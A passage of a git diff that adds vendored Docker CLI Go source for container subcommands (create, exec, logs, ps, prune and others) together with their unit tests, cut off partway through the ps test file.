fmt.Errorf("Failed to create the container ID file: %s", err) + } + + return &cidFile{path: path, file: f}, nil +} + +func createContainer(ctx context.Context, dockerCli *command.DockerCli, config *container.Config, hostConfig *container.HostConfig, networkingConfig *networktypes.NetworkingConfig, cidfile, name string) (*container.ContainerCreateCreatedBody, error) { + stderr := dockerCli.Err() + + var containerIDFile *cidFile + if cidfile != "" { + var err error + if containerIDFile, err = newCIDFile(cidfile); err != nil { + return nil, err + } + defer containerIDFile.Close() + } + + var trustedRef reference.Canonical + _, ref, err := reference.ParseIDOrReference(config.Image) + if err != nil { + return nil, err + } + if ref != nil { + ref = reference.WithDefaultTag(ref) + + if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { + var err error + trustedRef, err = image.TrustedReference(ctx, dockerCli, ref, nil) + if err != nil { + return nil, err + } + config.Image = trustedRef.String() + } + } + + //create the container + response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) + + //if image not found try to pull it + if err != nil { + if apiclient.IsErrImageNotFound(err) && ref != nil { + fmt.Fprintf(stderr, "Unable to find image '%s' locally\n", ref.String()) + + // we don't want to write to stdout anything apart from container.ID + if err = pullImage(ctx, dockerCli, config.Image, stderr); err != nil { + return nil, err + } + if ref, ok := ref.(reference.NamedTagged); ok && trustedRef != nil { + if err := image.TagTrusted(ctx, dockerCli, trustedRef, ref); err != nil { + return nil, err + } + } + // Retry + var retryErr error + response, retryErr = dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) + if retryErr != nil { + return nil, retryErr + } + } else { + return nil, err + } + } + + for _, warning := range response.Warnings { + fmt.Fprintf(stderr, "WARNING: %s\n", warning) + } + if containerIDFile != nil { + if err = containerIDFile.Write(response.ID); err != nil { + return nil, err + } + } + return &response, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/diff.go b/vendor/github.com/docker/docker/cli/command/container/diff.go new file mode 100644 index 0000000000..12d6591014 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/diff.go @@ -0,0 +1,58 @@ +package container + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/archive" + "github.com/spf13/cobra" +) + +type diffOptions struct { + container string +} + +// NewDiffCommand creates a new cobra.Command for `docker diff` +func NewDiffCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts diffOptions + + return &cobra.Command{ + Use: "diff CONTAINER", + Short: "Inspect changes on a container's filesystem", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runDiff(dockerCli, &opts) + }, + } +} + +func runDiff(dockerCli *command.DockerCli, opts *diffOptions) error { + if opts.container == "" { + return fmt.Errorf("Container name cannot be empty") + } + ctx := context.Background() + + changes, err := dockerCli.Client().ContainerDiff(ctx, opts.container) + if err != nil { + return err + } + + for _, change := range changes { + var kind string + switch change.Kind { + case archive.ChangeModify: + kind = "C" + case archive.ChangeAdd: + kind = "A" + case archive.ChangeDelete: + kind = "D" + } + fmt.Fprintf(dockerCli.Out(), "%s %s\n", kind, change.Path) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec.go b/vendor/github.com/docker/docker/cli/command/container/exec.go new file mode 100644 index 0000000000..f0381494e2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/exec.go @@ -0,0 +1,207 @@ +package container + +import ( + "fmt" + "io" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + apiclient "github.com/docker/docker/client" + options "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/promise" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/cobra" +) + +type execOptions struct { + detachKeys string + interactive bool + tty bool + detach bool + user string + privileged bool + env *options.ListOpts +} + +func newExecOptions() *execOptions { + var values []string + return &execOptions{ + env: options.NewListOptsRef(&values, runconfigopts.ValidateEnv), + } +} + +// NewExecCommand creats a new cobra.Command for `docker exec` +func NewExecCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := newExecOptions() + + cmd := &cobra.Command{ + Use: "exec [OPTIONS] CONTAINER COMMAND [ARG...]", + Short: "Run a command in a running container", + Args: cli.RequiresMinArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + container := args[0] + execCmd := args[1:] + return runExec(dockerCli, opts, container, execCmd) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + flags.StringVarP(&opts.detachKeys, "detach-keys", "", "", "Override the key sequence for detaching a container") + flags.BoolVarP(&opts.interactive, "interactive", "i", false, "Keep STDIN open even if not attached") + flags.BoolVarP(&opts.tty, "tty", "t", false, "Allocate a pseudo-TTY") + flags.BoolVarP(&opts.detach, "detach", "d", false, "Detached mode: run command in the background") + flags.StringVarP(&opts.user, "user", "u", "", "Username or UID (format: [:])") + flags.BoolVarP(&opts.privileged, "privileged", "", false, "Give extended privileges to the command") + flags.VarP(opts.env, "env", "e", "Set environment variables") + flags.SetAnnotation("env", "version", []string{"1.25"}) + + return cmd +} + +func runExec(dockerCli *command.DockerCli, opts *execOptions, container string, execCmd []string) error { + execConfig, err := parseExec(opts, execCmd) + // just in case the ParseExec does not exit + if container == "" || err != nil { + return cli.StatusError{StatusCode: 1} + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + // Send client escape keys + execConfig.DetachKeys = dockerCli.ConfigFile().DetachKeys + + ctx := context.Background() + client := dockerCli.Client() + + response, err := client.ContainerExecCreate(ctx, container, *execConfig) + if err != nil { + return err + } + + execID := response.ID + if execID == "" { + fmt.Fprintf(dockerCli.Out(), "exec ID empty") + return nil + } + + //Temp struct for execStart so that we don't need to transfer all the execConfig + if !execConfig.Detach { + if err := dockerCli.In().CheckTty(execConfig.AttachStdin, execConfig.Tty); err != nil { + return err + } + } else { + execStartCheck := types.ExecStartCheck{ + Detach: execConfig.Detach, + Tty: execConfig.Tty, + } + + if err := client.ContainerExecStart(ctx, execID, execStartCheck); err != nil { + return err + } + // For now don't print this - wait for when we support exec wait() + // fmt.Fprintf(dockerCli.Out(), "%s\n", execID) + return nil + } + + // Interactive exec requested. + var ( + out, stderr io.Writer + in io.ReadCloser + errCh chan error + ) + + if execConfig.AttachStdin { + in = dockerCli.In() + } + if execConfig.AttachStdout { + out = dockerCli.Out() + } + if execConfig.AttachStderr { + if execConfig.Tty { + stderr = dockerCli.Out() + } else { + stderr = dockerCli.Err() + } + } + + resp, err := client.ContainerExecAttach(ctx, execID, *execConfig) + if err != nil { + return err + } + defer resp.Close() + errCh = promise.Go(func() error { + return holdHijackedConnection(ctx, dockerCli, execConfig.Tty, in, out, stderr, resp) + }) + + if execConfig.Tty && dockerCli.In().IsTerminal() { + if err := MonitorTtySize(ctx, dockerCli, execID, true); err != nil { + fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) + } + } + + if err := <-errCh; err != nil { + logrus.Debugf("Error hijack: %s", err) + return err + } + + var status int + if _, status, err = getExecExitCode(ctx, client, execID); err != nil { + return err + } + + if status != 0 { + return cli.StatusError{StatusCode: status} + } + + return nil +} + +// getExecExitCode perform an inspect on the exec command. It returns +// the running state and the exit code. +func getExecExitCode(ctx context.Context, client apiclient.ContainerAPIClient, execID string) (bool, int, error) { + resp, err := client.ContainerExecInspect(ctx, execID) + if err != nil { + // If we can't connect, then the daemon probably died. + if !apiclient.IsErrConnectionFailed(err) { + return false, -1, err + } + return false, -1, nil + } + + return resp.Running, resp.ExitCode, nil +} + +// parseExec parses the specified args for the specified command and generates +// an ExecConfig from it. +func parseExec(opts *execOptions, execCmd []string) (*types.ExecConfig, error) { + execConfig := &types.ExecConfig{ + User: opts.user, + Privileged: opts.privileged, + Tty: opts.tty, + Cmd: execCmd, + Detach: opts.detach, + } + + // If -d is not set, attach to everything by default + if !opts.detach { + execConfig.AttachStdout = true + execConfig.AttachStderr = true + if opts.interactive { + execConfig.AttachStdin = true + } + } + + if opts.env != nil { + execConfig.Env = opts.env.GetAll() + } + + return execConfig, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec_test.go b/vendor/github.com/docker/docker/cli/command/container/exec_test.go new file mode 100644 index 0000000000..baeeaf1904 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/exec_test.go @@ -0,0 +1,116 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +type arguments struct { + options execOptions + execCmd []string +} + +func TestParseExec(t *testing.T) { + valids := map[*arguments]*types.ExecConfig{ + &arguments{ + execCmd: []string{"command"}, + }: { + Cmd: []string{"command"}, + AttachStdout: true, + AttachStderr: true, + }, + &arguments{ + execCmd: []string{"command1", "command2"}, + }: { + Cmd: []string{"command1", "command2"}, + AttachStdout: true, + AttachStderr: true, + }, + &arguments{ + options: execOptions{ + interactive: true, + tty: true, + user: "uid", + }, + execCmd: []string{"command"}, + }: { + User: "uid", + AttachStdin: true, + AttachStdout: true, + AttachStderr: true, + Tty: true, + Cmd: []string{"command"}, + }, + &arguments{ + options: execOptions{ + detach: true, + }, + execCmd: []string{"command"}, + }: { + AttachStdin: false, + AttachStdout: false, + AttachStderr: false, + Detach: true, + Cmd: []string{"command"}, + }, + &arguments{ + options: execOptions{ + tty: true, + interactive: true, + detach: true, + }, + execCmd: []string{"command"}, + }: { + AttachStdin: false, + AttachStdout: false, + AttachStderr: false, + Detach: true, + Tty: true, + Cmd: []string{"command"}, + }, + } + + for valid, expectedExecConfig := range valids { + execConfig, err := parseExec(&valid.options, valid.execCmd) + if err != nil { + t.Fatal(err) + } + if !compareExecConfig(expectedExecConfig, execConfig) { + t.Fatalf("Expected [%v] for %v, got [%v]", expectedExecConfig, valid, execConfig) + } + } +} + +func compareExecConfig(config1 *types.ExecConfig, config2 *types.ExecConfig) bool { + if config1.AttachStderr != config2.AttachStderr { + return false + } + if config1.AttachStdin != config2.AttachStdin { + return false + } + if config1.AttachStdout != config2.AttachStdout { + return false + } + if config1.Detach != config2.Detach { + return false + } + if config1.Privileged != config2.Privileged { + return false + } + if config1.Tty != config2.Tty { + return false + } + if config1.User != config2.User { + return false + } + if len(config1.Cmd) != len(config2.Cmd) { + return false + } + for index, value := range config1.Cmd { + if value != config2.Cmd[index] { + return false + } + } + return true +} diff --git a/vendor/github.com/docker/docker/cli/command/container/export.go b/vendor/github.com/docker/docker/cli/command/container/export.go new file mode 100644 index 0000000000..8fa2e5d77e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/export.go @@ -0,0 +1,59 @@ +package container + +import ( + "errors" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type exportOptions struct { + container string + output string +} + +// NewExportCommand creates a new `docker export` command +func NewExportCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts exportOptions + + cmd := &cobra.Command{ + Use: "export [OPTIONS] CONTAINER", + Short: "Export a container's filesystem as a tar archive", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runExport(dockerCli, opts) + }, + } + + flags := cmd.Flags() + + flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") + + return cmd +} + +func runExport(dockerCli *command.DockerCli, opts exportOptions) error { + if opts.output == "" && dockerCli.Out().IsTerminal() { + return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.") + } + + clnt := dockerCli.Client() + + responseBody, err := clnt.ContainerExport(context.Background(), opts.container) + if err != nil { + return err + } + defer responseBody.Close() + + if opts.output == "" { + _, err := io.Copy(dockerCli.Out(), responseBody) + return err + } + + return command.CopyToFile(opts.output, responseBody) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/hijack.go b/vendor/github.com/docker/docker/cli/command/container/hijack.go new file mode 100644 index 0000000000..ca136f0e43 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/hijack.go @@ -0,0 +1,116 @@ +package container + +import ( + "io" + "runtime" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stdcopy" + "golang.org/x/net/context" +) + +// holdHijackedConnection handles copying input to and output from streams to the +// connection +func holdHijackedConnection(ctx context.Context, streams command.Streams, tty bool, inputStream io.ReadCloser, outputStream, errorStream io.Writer, resp types.HijackedResponse) error { + var ( + err error + restoreOnce sync.Once + ) + if inputStream != nil && tty { + if err := setRawTerminal(streams); err != nil { + return err + } + defer func() { + restoreOnce.Do(func() { + restoreTerminal(streams, inputStream) + }) + }() + } + + receiveStdout := make(chan error, 1) + if outputStream != nil || errorStream != nil { + go func() { + // When TTY is ON, use regular copy + if tty && outputStream != nil { + _, err = io.Copy(outputStream, resp.Reader) + // we should restore the terminal as soon as possible once connection end + // so any following print messages will be in normal type. + if inputStream != nil { + restoreOnce.Do(func() { + restoreTerminal(streams, inputStream) + }) + } + } else { + _, err = stdcopy.StdCopy(outputStream, errorStream, resp.Reader) + } + + logrus.Debug("[hijack] End of stdout") + receiveStdout <- err + }() + } + + stdinDone := make(chan struct{}) + go func() { + if inputStream != nil { + io.Copy(resp.Conn, inputStream) + // we should restore the terminal as soon as possible once connection end + // so any following print messages will be in normal type. + if tty { + restoreOnce.Do(func() { + restoreTerminal(streams, inputStream) + }) + } + logrus.Debug("[hijack] End of stdin") + } + + if err := resp.CloseWrite(); err != nil { + logrus.Debugf("Couldn't send EOF: %s", err) + } + close(stdinDone) + }() + + select { + case err := <-receiveStdout: + if err != nil { + logrus.Debugf("Error receiveStdout: %s", err) + return err + } + case <-stdinDone: + if outputStream != nil || errorStream != nil { + select { + case err := <-receiveStdout: + if err != nil { + logrus.Debugf("Error receiveStdout: %s", err) + return err + } + case <-ctx.Done(): + } + } + case <-ctx.Done(): + } + + return nil +} + +func setRawTerminal(streams command.Streams) error { + if err := streams.In().SetRawTerminal(); err != nil { + return err + } + return streams.Out().SetRawTerminal() +} + +func restoreTerminal(streams command.Streams, in io.Closer) error { + streams.In().RestoreTerminal() + streams.Out().RestoreTerminal() + // WARNING: DO NOT REMOVE THE OS CHECK !!! + // For some reason this Close call blocks on darwin.. + // As the client exists right after, simply discard the close + // until we find a better solution. + if in != nil && runtime.GOOS != "darwin" { + return in.Close() + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/inspect.go b/vendor/github.com/docker/docker/cli/command/container/inspect.go new file mode 100644 index 0000000000..08a8d244df --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/inspect.go @@ -0,0 +1,47 @@ +package container + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + size bool + refs []string +} + +// newInspectCommand creates a new cobra.Command for `docker container inspect` +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Display detailed information on one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.refs = args + return runInspect(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + getRefFunc := func(ref string) (interface{}, []byte, error) { + return client.ContainerInspectWithRaw(ctx, ref, opts.size) + } + return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/kill.go b/vendor/github.com/docker/docker/cli/command/container/kill.go new file mode 100644 index 0000000000..6da91a40e3 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/kill.go @@ -0,0 +1,56 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type killOptions struct { + signal string + + containers []string +} + +// NewKillCommand creates a new cobra.Command for `docker kill` +func NewKillCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts killOptions + + cmd := &cobra.Command{ + Use: "kill [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Kill one or more running containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runKill(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.StringVarP(&opts.signal, "signal", "s", "KILL", "Signal to send to the container") + return cmd +} + +func runKill(dockerCli *command.DockerCli, opts *killOptions) error { + var errs []string + ctx := context.Background() + errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { + return dockerCli.Client().ContainerKill(ctx, container, opts.signal) + }) + for _, name := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/list.go b/vendor/github.com/docker/docker/cli/command/container/list.go new file mode 100644 index 0000000000..5bbf41966d --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/list.go @@ -0,0 +1,141 @@ +package container + +import ( + "io/ioutil" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/docker/docker/utils/templates" + "github.com/spf13/cobra" +) + +type psOptions struct { + quiet bool + size bool + all bool + noTrunc bool + nLatest bool + last int + format string + filter opts.FilterOpt +} + +// NewPsCommand creates a new cobra.Command for `docker ps` +func NewPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS]", + Short: "List containers", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runPs(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display numeric IDs") + flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes") + flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output") + flags.BoolVarP(&opts.nLatest, "latest", "l", false, "Show the latest created container (includes all states)") + flags.IntVarP(&opts.last, "last", "n", -1, "Show n last created containers (includes all states)") + flags.StringVarP(&opts.format, "format", "", "", "Pretty-print containers using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := *NewPsCommand(dockerCli) + cmd.Aliases = []string{"ps", "list"} + cmd.Use = "ls [OPTIONS]" + return &cmd +} + +// listOptionsProcessor is used to set any container list options which may only +// be embedded in the format template. +// This is passed directly into tmpl.Execute in order to allow the preprocessor +// to set any list options that were not provided by flags (e.g. `.Size`). +// It is using a `map[string]bool` so that unknown fields passed into the +// template format do not cause errors. These errors will get picked up when +// running through the actual template processor. +type listOptionsProcessor map[string]bool + +// Size sets the size of the map when called by a template execution. +func (o listOptionsProcessor) Size() bool { + o["size"] = true + return true +} + +// Label is needed here as it allows the correct pre-processing +// because Label() is a method with arguments +func (o listOptionsProcessor) Label(name string) string { + return "" +} + +func buildContainerListOptions(opts *psOptions) (*types.ContainerListOptions, error) { + options := &types.ContainerListOptions{ + All: opts.all, + Limit: opts.last, + Size: opts.size, + Filters: opts.filter.Value(), + } + + if opts.nLatest && opts.last == -1 { + options.Limit = 1 + } + + tmpl, err := templates.Parse(opts.format) + + if err != nil { + return nil, err + } + + optionsProcessor := listOptionsProcessor{} + // This shouldn't error out but swallowing the error makes it harder + // to track down if preProcessor issues come up. Ref #24696 + if err := tmpl.Execute(ioutil.Discard, optionsProcessor); err != nil { + return nil, err + } + // At the moment all we need is to capture .Size for preprocessor + options.Size = opts.size || optionsProcessor["size"] + + return options, nil +} + +func runPs(dockerCli *command.DockerCli, opts *psOptions) error { + ctx := context.Background() + + listOptions, err := buildContainerListOptions(opts) + if err != nil { + return err + } + + containers, err := dockerCli.Client().ContainerList(ctx, *listOptions) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().PsFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().PsFormat + } else { + format = formatter.TableFormatKey + } + } + + containerCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewContainerFormat(format, opts.quiet, listOptions.Size), + Trunc: !opts.noTrunc, + } + return formatter.ContainerWrite(containerCtx, containers) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/logs.go b/vendor/github.com/docker/docker/cli/command/container/logs.go new file mode 100644 index 0000000000..3a37cedf43 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/logs.go @@ -0,0 +1,87 @@ +package container + +import ( + "fmt" + "io" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/stdcopy" + "github.com/spf13/cobra" +) + +var validDrivers = map[string]bool{ + "json-file": true, + "journald": true, +} + +type logsOptions struct { + follow bool + since string + timestamps bool + details bool + tail string + + container string +} + +// NewLogsCommand creates a new cobra.Command for `docker logs` +func NewLogsCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts logsOptions + + cmd := &cobra.Command{ + Use: "logs [OPTIONS] CONTAINER", + Short: "Fetch the logs of a container", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + return runLogs(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output") + flags.StringVar(&opts.since, "since", "", "Show logs since timestamp") + flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps") + flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs") + flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs") + return cmd +} + +func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error { + ctx := context.Background() + + c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) + if err != nil { + return err + } + + if !validDrivers[c.HostConfig.LogConfig.Type] { + return fmt.Errorf("\"logs\" command is supported only for \"json-file\" and \"journald\" logging drivers (got: %s)", c.HostConfig.LogConfig.Type) + } + + options := types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Since: opts.since, + Timestamps: opts.timestamps, + Follow: opts.follow, + Tail: opts.tail, + Details: opts.details, + } + responseBody, err := dockerCli.Client().ContainerLogs(ctx, opts.container, options) + if err != nil { + return err + } + defer responseBody.Close() + + if c.Config.Tty { + _, err = io.Copy(dockerCli.Out(), responseBody) + } else { + _, err = stdcopy.StdCopy(dockerCli.Out(), dockerCli.Err(), responseBody) + } + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/container/pause.go b/vendor/github.com/docker/docker/cli/command/container/pause.go new file mode 100644 index 0000000000..6817cf60eb --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/pause.go @@ -0,0 +1,49 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type pauseOptions struct { + containers []string +} + +// NewPauseCommand creates a new cobra.Command for `docker pause` +func NewPauseCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pauseOptions + + return &cobra.Command{ + Use: "pause CONTAINER [CONTAINER...]", + Short: "Pause all processes within one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runPause(dockerCli, &opts) + }, + } +} + +func runPause(dockerCli *command.DockerCli, opts *pauseOptions) error { + ctx := context.Background() + + var errs []string + errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerPause) + for _, container := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/port.go b/vendor/github.com/docker/docker/cli/command/container/port.go new file mode 100644 index 0000000000..ea15290145 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/port.go @@ -0,0 +1,78 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/go-connections/nat" + "github.com/spf13/cobra" +) + +type portOptions struct { + container string + + port string +} + +// NewPortCommand creates a new cobra.Command for `docker port` +func NewPortCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts portOptions + + cmd := &cobra.Command{ + Use: "port CONTAINER [PRIVATE_PORT[/PROTO]]", + Short: "List port mappings or a specific mapping for the container", + Args: cli.RequiresRangeArgs(1, 2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + if len(args) > 1 { + opts.port = args[1] + } + return runPort(dockerCli, &opts) + }, + } + return cmd +} + +func runPort(dockerCli *command.DockerCli, opts *portOptions) error { + ctx := context.Background() + + c, err := dockerCli.Client().ContainerInspect(ctx, opts.container) + if err != nil { + return err + } + + if opts.port != "" { + port := opts.port + proto := "tcp" + parts := strings.SplitN(port, "/", 2) + + if len(parts) == 2 && len(parts[1]) != 0 { + port = parts[0] + proto = parts[1] + } + natPort := port + "/" + proto + newP, err := nat.NewPort(proto, port) + if err != nil { + return err + } + if frontends, exists := c.NetworkSettings.Ports[newP]; exists && frontends != nil { + for _, frontend := range frontends { + fmt.Fprintf(dockerCli.Out(), "%s:%s\n", frontend.HostIP, frontend.HostPort) + } + return nil + } + return fmt.Errorf("Error: No public port '%s' published for %s", natPort, opts.container) + } + + for from, frontends := range c.NetworkSettings.Ports { + for _, frontend := range frontends { + fmt.Fprintf(dockerCli.Out(), "%s -> %s:%s\n", from, frontend.HostIP, frontend.HostPort) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/prune.go b/vendor/github.com/docker/docker/cli/command/container/prune.go new file mode 100644 index 0000000000..064f4c08e0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/prune.go @@ -0,0 +1,75 @@ +package container + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool +} + +// NewPruneCommand returns a new cobra prune command for containers +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune [OPTIONS]", + Short: "Remove all stopped containers", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + spaceReclaimed, output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + + return cmd +} + +const warning = `WARNING! This will remove all stopped containers. +Are you sure you want to continue?` + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().ContainersPrune(context.Background(), filters.Args{}) + if err != nil { + return + } + + if len(report.ContainersDeleted) > 0 { + output = "Deleted Containers:\n" + for _, id := range report.ContainersDeleted { + output += id + "\n" + } + spaceReclaimed = report.SpaceReclaimed + } + + return +} + +// RunPrune calls the Container Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return runPrune(dockerCli, pruneOptions{force: true}) +} diff --git a/vendor/github.com/docker/docker/cli/command/container/ps_test.go b/vendor/github.com/docker/docker/cli/command/container/ps_test.go new file mode 100644 index 0000000000..62b0545274 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/ps_test.go @@ -0,0 +1,118 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestBuildContainerListOptions(t *testing.T) { + filters := opts.NewFilterOpt() + assert.NilError(t, filters.Set("foo=bar")) + assert.NilError(t, filters.Set("baz=foo")) + + contexts := []struct { + psOpts *psOptions + expectedAll bool + expectedSize bool + expectedLimit int + expectedFilters map[string]string + }{ + { + psOpts: &psOptions{ + all: true, + size: true, + last: 5, + filter: filters, + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + { + psOpts: &psOptions{ + all: true, + size: true, + last: -1, + nLatest: true, + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 1, + expectedFilters: make(map[string]string), + }, + { + psOpts: &psOptions{ + all: true, + size: false, + last: 5, + filter: filters, + // With .Size, size should be true + format: "{{.Size}}", + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": 